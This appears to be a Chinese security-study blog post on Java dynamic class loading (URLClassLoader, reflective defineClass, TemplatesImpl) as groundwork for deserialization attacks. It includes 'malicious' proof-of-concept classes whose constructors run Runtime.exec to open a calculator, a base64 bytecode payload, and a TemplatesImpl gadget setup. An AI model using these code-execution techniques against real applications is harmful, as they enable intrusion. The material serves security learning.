java--动态加载

最新推荐文章于 2024-07-05 11:49:18 发布
最新推荐文章于 2024-07-05 11:49:18 发布
阅读量2.9k 收藏 2
点赞数 1
分类专栏: 代码审计学习 文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44769520/article/details/124824238
版权

Java字节码(ByteCode)指的是Java虚拟机执行使用的一类指令,通常被存储在.class文件中。

但是我们所说的"字节码"可以理解的更广义一些----所有能够恢复成一个类并在JVM虚拟机里加载的字节序列,都在我们的讨论范围之内。

Java的ClassLoader是用来加载字节码文件最基础的方法,ClassLoader就是一个"加载器",告诉Java虚拟机如何加载这个类。

ClassLoader就是根据类名来加载类,这个类名是类完整路径。

我们在学习反射的时候利用到的Class.forName就是这种,关于他俩的区别(反射中,Class.forName和ClassLoader区别 - 简书):

在java中Class.forName()和ClassLoader都可以对类进行加载。

区别:

(1)Class.forName除了将类的.class文件加载到jvm中之外,还会对类进行解释,执行类中的static块。

(2)而classloader只干一件事情,就是将.class文件加载到jvm中,不会执行static中的内容,只有在newInstance才会去执行static块。

#Class.forName(name,initialize,loader)带参数也可控制是否加载static块。并且只有调用了newInstance()方法采用调用构造函数,创建类的对象。

1.URLClassLoader

URLClassLoader实际上是我们平时默认使用的AppClassLoader的父类

正常情况下,Java会根据配置项sun.boot.class.path和java.class.path中列举到的基础路径来寻找.class文件加载,这个基础路径分为三种情况:

  • URL未以斜杠/结尾,则认为是一个JAR文件,使用JarLoader来寻找类,即为在Jar包中寻找.class文件

  • URL以斜杠/结尾,且协议名是file,则使用FildLoader来寻找类,即为在本地系统中寻找.class文件

  • URL以斜杠/结尾,且协议名不是file,则使用最基础的Loader来寻找类

利用过程:

首先先构造一个恶意的class文件

import java.io.IOException;


public class hello {
    public hello() throws IOException {
        Runtime.getRuntime().exec("open -a Calculator.app");
    }
}

使用javac hello.java 编译成class文件,然后使用python3 -m http.server,在当前目录启动http的服务,然后建立一个URLClassLoader

import java.net.URL;
import java.net.URLClassLoader;

public class HelloClassLoader {
    public static void main(String[] args)  {
        try {
            URL[] urls = new URL[]{new URL("http://127.0.0.1:8080/")};
            URLClassLoader urlClassLoader = new URLClassLoader(urls);
            Class clazz = urlClassLoader.loadClass("hello");
            clazz.newInstance();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

利用ClassLoader#defineClass 直接加载字节码文件 

ClassLoader#loadClass-->ClassLoader#findClass->ClassLoader#defineClass

  • loadClass的作用是从已加载的类缓存,父加载器等位置寻找(双亲委派机制),在前面没有找到的情况下,执行findClass

  • findClass的作用是根据URL指定的方式来加载类的字节码,可能会在本地系统,jar包或远程http服务器上读取字节码,然后将其交给defineClass

  • defineClass的作用是处理前面传入的字节码,将其处理成真正的Java类

使用上面编译好的hello.class,然后对其进行base64加密 

然后使用ClassLoader#defineClass加载

import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.Base64;


public class HelloClassLoader {
    public static void main(String[] args) throws InvocationTargetException, IllegalAccessException, InstantiationException, NoSuchMethodException {
        try {
            Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass",
                    String.class, byte[].class, int.class, int.class);
            defineClass.setAccessible(true);
            byte[] codes = Base64.getDecoder().decode("yv66vgAAADQAHAoABgAPCgAQABEIABIKABAAEwcAFAcAFQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAWAQAKU291cmNlRmlsZQEACmhlbGxvLmphdmEMAAcACAcAFwwAGAAZAQAWb3BlbiAtYSBDYWxjdWxhdG9yLmFwcAwAGgAbAQAFaGVsbG8BABBqYXZhL2xhbmcvT2JqZWN0AQATamF2YS9pby9JT0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsAIQAFAAYAAAAAAAEAAQAHAAgAAgAJAAAALgACAAEAAAAOKrcAAbgAAhIDtgAEV7EAAAABAAoAAAAOAAMAAAAEAAQABQANAAYACwAAAAQAAQAMAAEADQAAAAIADg==");
            Class expClazz = (Class) defineClass.invoke(ClassLoader.getSystemClassLoader(), "hello", codes, 0, codes.length);
            expClazz.newInstance();
        } catch (Exception e) {
            e.printStackTrace();
        }


    }
}
我们根据上面的描述可以对这些代码进行理解:首先是获取defineClass这个方法,可以看到它的定义是protected,那么首先修改定义域
其次在method.invoke方法的时候,我们知道第一个参数应该是ClassLoader这个对象,那么我们去看一下上面的定义,发现这里有一个定义好的ClassLoader对象scl,
我们跟进它的引用,发现有一个地方是return scl,
然后这里会进入initSystemClassLoader初始化程序
在这就可以获得Object的ClassLoader了

利用TemplatesImp加载字节码

虽然大部分上层开发者不会直接用到defineClass方法,但是Java底层还是有一些类用到了它,比如TemplatesImpl(com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl)这个类中定义了一个内部类TranslateClassloader,我们先构造一个exp,

(关于Exp的构造,TemplatesImpl中对加载字节码是有一定要求的:这个字节码对应的类必须是com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet的子类,创建Exp的时候需要使它继承AbstractTranslet,然后才可以被TemplatesImpl执行

于是Exp2

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.io.IOException;
public class Exp2 extends AbstractTranslet {
    public Exp2() throws IOException {
        Runtime.getRuntime().exec(new String[]{"open", "-na", "Calculator"});
    }


    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {


    }
}

使用javac Exp2.java 编译成class文件,然后使用TemplatesImpl加载


import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javax.xml.transform.TransformerConfigurationException;
import java.io.IOException;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;

public class TemplatesImplDemo {


    public static void main(String[] args) throws IOException, NoSuchFieldException, IllegalAccessException, TransformerConfigurationException {
        byte[] classBytes = Files.readAllBytes(Paths.get("/Users/zyer/Downloads/untitled/out/production/untitled/Exp2.class"));
        TemplatesImpl templates = new TemplatesImpl();
        Class clazz = templates.getClass();
        Field bytecodes = clazz.getDeclaredField("_bytecodes");
        Field name = clazz.getDeclaredField("_name");
        Field _tfactory = clazz.getDeclaredField("_tfactory");

        bytecodes.setAccessible(true);
        name.setAccessible(true);
        _tfactory.setAccessible(true);

        bytecodes.set(templates, new byte[][]{classBytes});
        name.set(templates, "zyer");
        _tfactory.set(templates, new TransformerFactoryImpl());
        templates.newTransformer();


    }
}
我们通过学习defineClass可以知道,
ClassLoader#loadClass-->ClassLoader#findClass->ClassLoader#defineClass
我们需要寻找哪里会使用defineClass,通过寻找
发现TranslateClassloader其中重写了defineClass,这个方法是static final,相当于定义常量,那么我们可以直接调用,
从TransletClassLoader#defineClass()向前追溯一下调用链(右键—>find Usages)
TemplatesImpl#getOutputProperties() -> TemplatesImpl#newTransformer() ->
TemplatesImpl#getTransletInstance() -> TemplatesImpl#defineTransletClasses()
-> TransletClassLoader#defineClass()
我们从第一个函数开始跟一下,寻找判断点
首先在getTransletInstance中,发现如果_name=null的话,会返回null,那么我们需要给_name赋值,然后_class=null的话,会进入defineTranletClasses,那么让_class为null即可
进入defineTranletClasses,在这里的判断发现需要_bytecodes不能为null,且在run函数中存在使用_tfactory参数,因为这个函数还存在返回值,那么我们继续跟进TransletClassLoader
进入TransletClassLoader,我们发现定义了一个_loadedExternalExtensionFunctions,这个map的值会与调用的TransletClassLoader,如果是两个参数的话,会给这个map赋值,且如果_loadedExternalExtensionFunctions不为null的时候会使用get方法,那么就需要TransletClassLoader传入的第二个参数不为空,那么_tfactory也不能为空
那么payload构造关键就是传参数,使用Field进行参数赋值 
Field bytes = name.getDeclaredField("_bytecodes");
Field name1 = name.getDeclaredField("_name");
Field factory = name.getDeclaredField("_tfactory");
最后调用getOutputProperties来进行整体的调用

参考(Java动态加载字节码的方法

最近由于毕业答辩啥的以及学校的一些原因导致最近几天没有学习,调整一天就需要重新恢复学习了。

zyer1
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
深入解析Java加载机制:原理、过程与实践
微笑听雨
05-27 6251
Java加载机制是Java虚拟机(JVM)运行时环境的核心组件,它决定了Java和接口的加载、连接和初始化方式。这一机制不仅确保了应用程序的安全性和稳定性,还提供了灵活的动态加载能力,使得Java程序能够在运行时加载和使用外部。这篇文章将深入解析Java加载机制的原理、详细过程以及实际应用,帮助开发者全面理解和掌握这一关键技术,从而更好地进行Java应用程序的开发和优化。
Java 反射:动态加载和调用教程
2301_76607156的博客
03-09 2218
动态代理是一种常用的设计模式,它可以在不修改原始代码的情况下增强已有代码的功能。它基于 Java 的反射机制实现,通常用于实现 AOP(面向切面编程)。本文介绍了 Java 反射的基本原理和用法,并通过动态代理实现了一个实际应用。反射可以在运行时动态地获取信息和调用方法,是 Java 中非常重要的特性之一。通过反射,我们可以在运行时创建对象、调用方法、获取属性和注解等信息。同时,反射还能够实现动态代理,帮助我们实现一些特殊的功能。
Java动态加载
Le1a's Blog
03-23 5785
Java动态加载 文章首发自: https://www.le1a.com/posts/9d41d3f8/ 前言 前面学习了反序列化,正准备趁热打铁去学cc3了,但是发现cc3需要用到动态加载,就先来学一下。 利用URLClassLoader加载远程class文件 首先了解下什么是ClassLoader? ClassLoader是一个"加载器",它会让Java虚拟机知道如何加载这个。默认的ClassLoader是根据名来加载的,这个名必须是的完整路径(跟反射有点似),例如java.lang.R
Java安全--篇2-动态加载
qq_64201116的博客
12-05 1035
首先我们来了解一下构造代码块和静态代码块:Java中静态代码块、构造代码块、构造函数、普通代码块 - YSOcean - 博客园 继上周我们重写了Person: 我们先写一个main来实例化Person看一下结果:看到这个结果我们可以观察到两个信息:接下来我们利用反射来尝试获取看看会发生什么:发现只调用了静态代码块为什么?了解一下是怎么加载到JVM中的:加载过程,以及什么是双亲委派? - 掘金用图来说就是这样:只要初始化了就会执行静态代码块如果实例化那么与对象相关的实例化和构造方法也会被调用
JVM动态加载深度剖析:Java程序员的高效编程秘诀
爱媳妇儿爱编程
09-30 5739
JVM(Java虚拟机)中的动态加载是一种在运行时加载的机制,它允许应用程序在不重新启动的情况下加载新的。它对Java应用程序的灵活性和扩展性至关重要。
Java-springboot动态加载jar包,动态配置
1
05-05 9425
服务中有众多任务,当其中任一任务有改动需要升级或新增一个任务时,都需要将服务重启,会影响其他任务的正常运行。因此采用java动态加载的方式,将不同任务插件化形式加载到服务中心,配合xxl-job任务调度框架统一管理。实现了插件化任务管理。
Java 动态加载
m0_47912936的博客
08-16 445
什么是Java 动态加载 动态加载是指在程序运行阶段,将写好的通过装载器动态的装载这个到JVM中,然后再根据这个内容(引用的包),再去装载其他的. 动态加载的作用 与动态加载所对应的是Java静态加载,静态加载的耦合度高,不利于功能扩展,使用动态加载可以不用修改源程序。 若项目复杂,当添加新功能的时候,静态加载极易出错。动态加载可以避免这问题。 静态加载实例 Comic ,实体(entity) package test.sf.dynamicLoad; public class Com
java 动态加载
小小布的程序世界
02-23 3451
一、什么是动态加载动态加载:通过Class.forName的方式来得到一个Class型的实例,然后通过这个Class型的实例的newInstance来初始化,这种方法我们称之为动态加载程序在运行时调用相应方法,即使其他方法是错误的,程序依旧会执行。通过动态加载可以让程序的可延长性大大提升,对以后的维护和扩展有重要意义。Class c = Class.forName("com.mianshi.t
Java语言-动态编译代码并热加载
06-08
Java编程中,动态编译代码并热加载是一项重要的技术,它允许程序在运行时修改或添加新的,而无需重启应用。这种能力对于快速迭代开发、调试和性能优化非常有用。本主题将深入探讨Java中的动态编译与热加载机制...
MySQL-connector-java-8.0.28
04-20
MySQL-connector-java-8.0.28 是MySQL数据库与Java应用程序之间通信的重要组件,它是一个JDBC(Java Database Connectivity)驱动程序,使得Java开发者能够通过编写Java代码来访问和操作MySQL数据库。在这个版本中,...
mysql-connector-java-8.0.29.jar
05-30
MySQL Connector/J 8.0.29 是MySQL数据库与Java应用程序之间通信的重要桥梁,它是一个实现了Java Database Connectivity (JDBC) API的驱动程序,使得Java开发者能够方便地在Java应用中连接并操作MySQL数据库。...
mysql-connector-java-8.0.28.jar
01-13
使用MySQL Connector/J时,开发者需要在Java代码中导入相应的jar文件,并通过JDBC驱动管理器加载驱动。以下是一个简单的示例: ```java import java.sql.Connection; import java.sql.DriverManager; import java....
mysql-connector-java-8.0.28
03-26
这可以通过设置IDE的构建路径、在命令行中使用`java -cp`选项或在运行时动态加载实现。一旦驱动被加载,就可以通过以下步骤连接到MySQL数据库: 1. 加载Driver:`Class.forName("com.mysql.cj.jdbc.Driver")` 2. ...
JavaJava快速入门
woaimx_1314的博客
05-09 4981
包的名字和项目路径下的目录路径相对应,比如:项目路径为:C:\Study,有一个Java源文件位于:C:\Study\com\happyframework\study\App.java,那么App.java的包名字必须为:com.happyframework.study,且 App.java 的第一行语句必须为:package com.happyframework.study。Java中所有的赋值和方法调用都是“按值“处理的,引用型的值是对象的地址,原始型的值是其自身。
java 热替换,透过现象看本质:Java动态加载和热替换
2401_84046912的博客
04-15 693
这份《“java高分面试指南”-25分227页1000+题50w+字解析》同样可分享给有需要的朋友,感兴趣的伙伴们可挑战一下自我,在不看答案解析的情况,测试测试自己的解题水平,这样也能达到事半功倍的效果!(好东西要大家一起看才香)《互联网大厂面试真题解析、进阶开发核心学习笔记、全套讲解视频、实战项目源码讲义》点击传送门即可获取![外链图片转存中…(img-MUmdLevc-1713113578760)]《互联网大厂面试真题解析、进阶开发核心学习笔记、全套讲解视频、实战项目源码讲义》点击传送门即可获取!
java动态加载_Java动态加载
weixin_29701553的博客
02-12 1323
package com.biao.util;import java.io.File;import java.net.URL;import java.net.URLClassLoader;import com.biao.ActionInterface;/*** 使用URLClassLoader动态加载Class和jar包中的. 这样,可以把这些路径放在配置文件中,动态加载.*/public...
Java中的动态加载详解
最新发布
微赚开发者技术分享博客
07-05 347
今天我们将深入探讨Java中的动态加载,这是一种在运行时加载文件的重要机制。动态加载通过反射和自定义加载器机制,使得程序在运行时可以根据需要动态加载和使用,提高了应用程序的灵活性和可维护性。Java中的动态加载能够使程序在运行过程中动态地装载、链接和初始化,从而增强程序的灵活性和可扩展性。除了Java标准库提供的加载器外,我们还可以自定义加载器来实现更灵活的动态加载需求。在Java中,实现动态加载主要依赖于Java的反射机制和加载器(ClassLoader)机制。
使用Java中的反射技术实现动态加载和方法
Y18870954401的博客
07-18 726
通过反射,我们可以动态加载和方法,使得程序具有更高的灵活性和可扩展性。本文将介绍如何使用Java中的反射技术实现动态加载和方法,并通过代码示例进行演示。通过上述代码示例,我们成功地使用反射技术动态加载"DynamicClass"并调用了它的方法"dynamicMethod"。这种动态加载和方法的方式可以在运行时根据需要加载和调用不同的和方法,从而实现更灵活和可扩展的程序设计。假设我们有一个名为"DynamicClass"的,它包含一个名为"dynamicMethod"的方法。
java -jar -server区别
11-29
根据提供的引用内容,`java -jar`和`java -server`是两个不同的命令。 `java -jar`命令用于运行一个打包好的Java应用程序,它会自动寻找并加载应用程序所需的所有依赖项。例如,如果你有一个名为`demo.jar`的应用程序,你可以使用以下命令运行它: ```shell java -jar demo.jar ``` `java -server`命令则是用于启动Java虚拟机(JVM)时指定JVM的模式。在`-server`模式下,JVM会优化长时间运行的应用程序,以提高应用程序的性能。这种模式适用于需要长时间运行的服务器应用程序。例如,你可以使用以下命令启动一个Spring Boot应用程序,并将JVM设置为`-server`模式: ```shell java -Xms4095m -Xmx8192m -server -jar demo.jar --server.port=8080 ``` 在这个例子中,`-Xms`和`-Xmx`选项用于设置JVM的初始堆大小和最大堆大小,`-server`选项用于启用`-server`模式。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值